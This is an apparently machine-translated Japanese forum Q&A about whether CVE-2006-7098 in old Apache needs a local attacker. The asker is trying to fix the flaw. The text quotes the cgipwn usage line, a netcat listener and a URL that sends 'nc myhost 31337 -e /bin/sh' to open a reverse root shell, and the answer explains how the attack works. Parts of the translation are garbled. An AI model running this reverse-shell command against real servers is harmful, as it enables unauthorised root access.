CVE 2006-7098脆弱なDebianにアクセス(ログイン)する必要がありますか?

CVE 2006-7098脆弱なDebianにアクセス(ログイン)する必要がありますか?

私はApache 1.3.34以前の脆弱性の解決に取り組んでいます。そして、CVE 2006-7098の脆弱性がどのような状況で悪用される可能性があるのか​​わかりません。これ閲覧ファイルエクスプロイトには以下が含まれます。

ローカル攻撃者はApacheに影響を与え、Apacheプロセスを開始したユーザー(通常はroot)が所有するパブリックttyにコマンドを渡すことができます。これにより、任意のコマンドが実行される可能性があります。注:CGI実行権限が必要であり、rootとしてシェルを介して手動でサービスを開始する必要があります。

使用法:CNC-vvv-lp 31337 http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d

当初、私は脆弱なサーバーと同じネットワーク上の他のコンピュータで脆弱性を悪用する可能性があることを知りました。だから他のマシン(攻撃者)から私は:

  • cgipwnエクスプロイトをコンパイルし、攻撃者マシンのApacheのcgi-binにインストールします。
  • 攻撃者のマシンでncコマンドを実行し、-pを攻撃者のApacheがリッスンするポートとして指定します。ネットワークサーバー攻撃者システムのIPで私のホスト脆弱なサーバーとして。

しかし、私は成功しませんでした。コマンドは何も返しません。

それで、エクスプロイト情報を何度も読んでみると、この文に疑問点が生じました。ローカル攻撃者:これは、脆弱なApacheを実行しているのと同じコンピュータでのみ脆弱性が悪用される可能性があるという意味ですか?この場合、私は攻撃者が最初にApacheを管理する権限を持つシステムで有効なユーザーの資格情報を持っている必要があることを理解しています(これは攻撃の適用可能性を大幅に減らします)。

誰でもこれを説明できますか?

ベストアンサー1

したがって、エクスプロイト情報を何度も読み直した後、「ローカル攻撃者」という用語について少し疑問が生じました。これは、脆弱なApacheを実行しているのと同じコンピュータでのみ脆弱性をエクスプロイトできることを意味しますか?この場合、私は攻撃者が最初にApacheを管理する権限を持つシステムで有効なユーザーの資格情報を持っている必要があることを理解しています(これは攻撃の適用可能性を大幅に減らします)。

あなたは正しいです。実際には、webserverこの脆弱性があるターゲットサーバー、myhostつまり攻撃者のマシンです。

攻撃者はcgipwnバイナリファイルをディレクトリに配置webserverし、それを/cgi-bin開いて(通常)Apacheを起動したユーザーとしてタスクを実行しようとします。http://webserver/cgi-bin/cgipwn?...nc myhost 31337 /bin/shwebserverroot

攻撃者は以前に接続を受け入れるnc -vvv -l -p 31337ように実行しました。すべてが順調に進むと、攻撃者はApacheを起動したユーザーとして実行されている対話型セッションにアクセスできます。myhostncwebserver/bin/shwebserver

おすすめ記事